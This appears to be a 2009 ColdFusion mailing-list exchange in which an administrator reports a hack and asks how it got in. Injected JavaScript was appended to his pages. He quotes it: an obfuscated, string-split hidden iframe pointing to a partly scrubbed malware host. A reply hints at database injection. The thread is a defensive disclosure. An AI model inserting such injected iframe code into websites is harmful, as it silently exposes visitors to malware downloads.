Do a search on this list for 'exec('
There was a big todo about this last summer. Probably in your database
-----Original Message-----
From: Nick Gleason <n.glea...@citysoft.com>
Sent: Monday, April 06, 2009 2:19 PM
To: cf-talk <cf-talk@houseoffusion.com>
Subject: Question about hack
Hi there. We've just seen a hack attempt that we haven't seen before and I
wanted to get feedback.
The symptom is that some script code is inserted at the bottom of certain
pages (e.g. index.cfm). The script (which has been scrubbed) looks like
this:
<script><!--
var applstrna0 = "<if";
var applstrna1 = "rame src=http://said7";;
var applstrna2 = ".[BAD URL HERE]";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>
The script downloads malware, which we obviously want to prevent. We're
trying to determine how it's getting in their, whether through an old site
with inadequate code or the OS or something else. Any thoughts?
This is on a server running IIS 6 / CF7.
Thanks in advance,
Nick
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;207172674;29440083;f
Archive:
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321362
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
